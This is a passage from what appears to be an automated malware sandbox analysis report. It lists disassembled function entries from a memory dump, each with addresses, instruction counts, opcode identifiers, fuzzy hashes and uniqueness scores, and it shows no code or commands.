                                                                                                                                            • Opcode ID: 2a015679fa2033decadea4ef936d93541e5f3368c0fc05b5a67e216fd28c06e1
                                                                                                                                            • Instruction ID: 159756f352a362f6871349823d0cf66b2c8f970f2325fb88541663a5b664e111
                                                                                                                                            • Opcode Fuzzy Hash: 2a015679fa2033decadea4ef936d93541e5f3368c0fc05b5a67e216fd28c06e1
                                                                                                                                            • Instruction Fuzzy Hash: FDF0823194D7C94FD742BB3458161AA7BB0EF57340F8605E7E448CB1E3EA285D548752
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F15E49 Relevance: .0, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7eafe165a6981a4cd46806590c9cee449edc025e682c8fc11519e2edff3c9609
                                                                                                                                            • Instruction ID: 024f04cd9bd9e37d474c462253f678c2eef93fba8b3787e5520b771a0e8e4443
                                                                                                                                            • Opcode Fuzzy Hash: 7eafe165a6981a4cd46806590c9cee449edc025e682c8fc11519e2edff3c9609
                                                                                                                                            • Instruction Fuzzy Hash: A7F03031E4D98B9FE796A76864122E8B7A1EF4A3A0F4400B6D40DCB1C7DE1C2D854756
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F14BA9 Relevance: .0, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cb07eb51a24bde180a5e21a8aad61ac0de6c86b8940a97772aa21726e97dde6f
                                                                                                                                            • Instruction ID: 9895893977abc336bdc750ad11c2f50e01d326686bb990489b8617c29f54252d
                                                                                                                                            • Opcode Fuzzy Hash: cb07eb51a24bde180a5e21a8aad61ac0de6c86b8940a97772aa21726e97dde6f
                                                                                                                                            • Instruction Fuzzy Hash: 2DF0273160D4904FD365EB2C88647603FF1FF9A340B1941EAD08DC75A3C6488C048352
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F109E0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 98a043bcd0db151509cd8f0f4ca1a98e09d7e9aa700eb8292a62880c0f912ac1
                                                                                                                                            • Instruction ID: 31d141dd5137dc94a98a7f557363e13afa3edb76ebc6c401a02186d067fc0dee
                                                                                                                                            • Opcode Fuzzy Hash: 98a043bcd0db151509cd8f0f4ca1a98e09d7e9aa700eb8292a62880c0f912ac1
                                                                                                                                            • Instruction Fuzzy Hash: 23F0A03090DA9B5FE785FB3C409516967D0DF9A3C4F0580B5E808CB1D7EE285C894311
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F10971 Relevance: .0, Instructions: 28COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f28ddd2acb5bdb928f20194d01924ccd88ba7c1d438bc95349004dc5ddf8a7df
                                                                                                                                            • Instruction ID: da493a797ae6fd51ce0c3b8133cbd332fdf06def178efc81daf5e3578ab3e526
                                                                                                                                            • Opcode Fuzzy Hash: f28ddd2acb5bdb928f20194d01924ccd88ba7c1d438bc95349004dc5ddf8a7df
                                                                                                                                            • Instruction Fuzzy Hash: 0AE0D831C4D95D8FDB44BB5898116D537A4FB49304F400169D54CC7181D7255990C385
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F112B8 Relevance: .0, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ac411e9bf20ee27a541def2b3fcbcf5d542e5da9e26b4223426fc78667dcef70
                                                                                                                                            • Instruction ID: 14e051fb1ab4f83ce6e71c3eecbb594fb8050b57c85c7f4a631fa279685c8bb1
                                                                                                                                            • Opcode Fuzzy Hash: ac411e9bf20ee27a541def2b3fcbcf5d542e5da9e26b4223426fc78667dcef70
                                                                                                                                            • Instruction Fuzzy Hash: 06E0C722B1E9AE4FD290FA1CA84217873C1EBC8AA0B2041BBE08EC3299C9105C0A03C0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1D145 Relevance: .0, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9d3f11468667820df7322045be57043db538e920550d7f75c02e8dff326cd601
                                                                                                                                            • Instruction ID: 71f192704644a948bb11bb3b66d32b151901402ce924e1dd6763db50d7ca93b8
                                                                                                                                            • Opcode Fuzzy Hash: 9d3f11468667820df7322045be57043db538e920550d7f75c02e8dff326cd601
                                                                                                                                            • Instruction Fuzzy Hash: 21E0923284DB890FD712A72448151987FB0FF46250F4501E7D4488A097EA1D9A48C301
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1E05E Relevance: .0, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 06358779bdd2a98ae9f25bfc5826f40be947c6cc2a5ae4dd1c245430c6a76f3f
                                                                                                                                            • Instruction ID: 89acb7108f80f97fe772d137c592426bbebc123d60336f85c35db2c244f653fc
                                                                                                                                            • Opcode Fuzzy Hash: 06358779bdd2a98ae9f25bfc5826f40be947c6cc2a5ae4dd1c245430c6a76f3f
                                                                                                                                            • Instruction Fuzzy Hash: A8E04F30A0DF4B8FD746A7299010960B391EF4A39475404B8C409CA6D6DE2EDCC2CB40
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F1367D Relevance: .0, Instructions: 20COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 353f191afd133e3751535c96dfa57d4187f8551f27c697a4f19616e29d7e74a3
                                                                                                                                            • Instruction ID: 4f8400e6dfc7f250d35eb6d37776c1519ff0e81b4464b0a80de08bacccaeef28
                                                                                                                                            • Opcode Fuzzy Hash: 353f191afd133e3751535c96dfa57d4187f8551f27c697a4f19616e29d7e74a3
                                                                                                                                            • Instruction Fuzzy Hash: A6E0863190CE980FDBB5F72955A99517FD0EB59210B4901DED089C75D2E648EC858346
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F11974 Relevance: .0, Instructions: 20COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f2f0f3720794cda7d8479cf8c5e610cdb17b7e9aec77ef100d2bdaebb1dbaf1e
                                                                                                                                            • Instruction ID: 3416bf94231ae9524db3e04ce42e6fbf34ec50e8337f201e23c529aba5d3dc61
                                                                                                                                            • Opcode Fuzzy Hash: f2f0f3720794cda7d8479cf8c5e610cdb17b7e9aec77ef100d2bdaebb1dbaf1e
                                                                                                                                            • Instruction Fuzzy Hash: 37D0A933A0D3280DA71A72087C030FC2B80DAC22B0B000077D68E85083AA02252241CA
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F108C4 Relevance: .0, Instructions: 20COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5b97cbdc3b8af03059058ecead8f1e11f311bb140999bf10ee4a7eb7a054a322
                                                                                                                                            • Instruction ID: 95a653f1685983e3e727d29cf9bf7183f98917be08cbd4f5a807e800a1ea8664
                                                                                                                                            • Opcode Fuzzy Hash: 5b97cbdc3b8af03059058ecead8f1e11f311bb140999bf10ee4a7eb7a054a322
                                                                                                                                            • Instruction Fuzzy Hash: E4D0C92298CC3A05E26832D93C870E87180CBD5374F6A5531E819C00C2C94E1DE211D9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 00007FF848F1AED5 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: E
                                                                                                                                            • API String ID: 0-3568589458
                                                                                                                                            • Opcode ID: d75665b95afc2b8f5c52b63db517ce0a1d0a084ba1bc68ed3041b2fab9395cee
                                                                                                                                            • Instruction ID: 897237a245d98c2a0a0fa2d04683b41840e0c333d6284965ba4f0e99bb75aaf9
                                                                                                                                            • Opcode Fuzzy Hash: d75665b95afc2b8f5c52b63db517ce0a1d0a084ba1bc68ed3041b2fab9395cee
                                                                                                                                            • Instruction Fuzzy Hash: 9F91862761F5669AD35277BD78521EA6B60EF413B9F0843B7D18CCD0D3DA0C248683EA
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00007FF848F11388 Relevance: .3, Instructions: 337COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2183814897.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 91086209e0e120186ebf5b48118da8482e0fe9b3dd9495ad6a45861173fb4f18
                                                                                                                                            • Instruction ID: 096c480877a4fe7a9daa2e8217713aa5d8dd35ef560864dc8570814af0a257b8
                                                                                                                                            • Opcode Fuzzy Hash: 91086209e0e120186ebf5b48118da8482e0fe9b3dd9495ad6a45861173fb4f18
                                                                                                                                            • Instruction Fuzzy Hash: 69917836B1D9588FD754FB2CA4456EA77E0FFC1371B0801BBD148CB193DA18AC4A83A5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%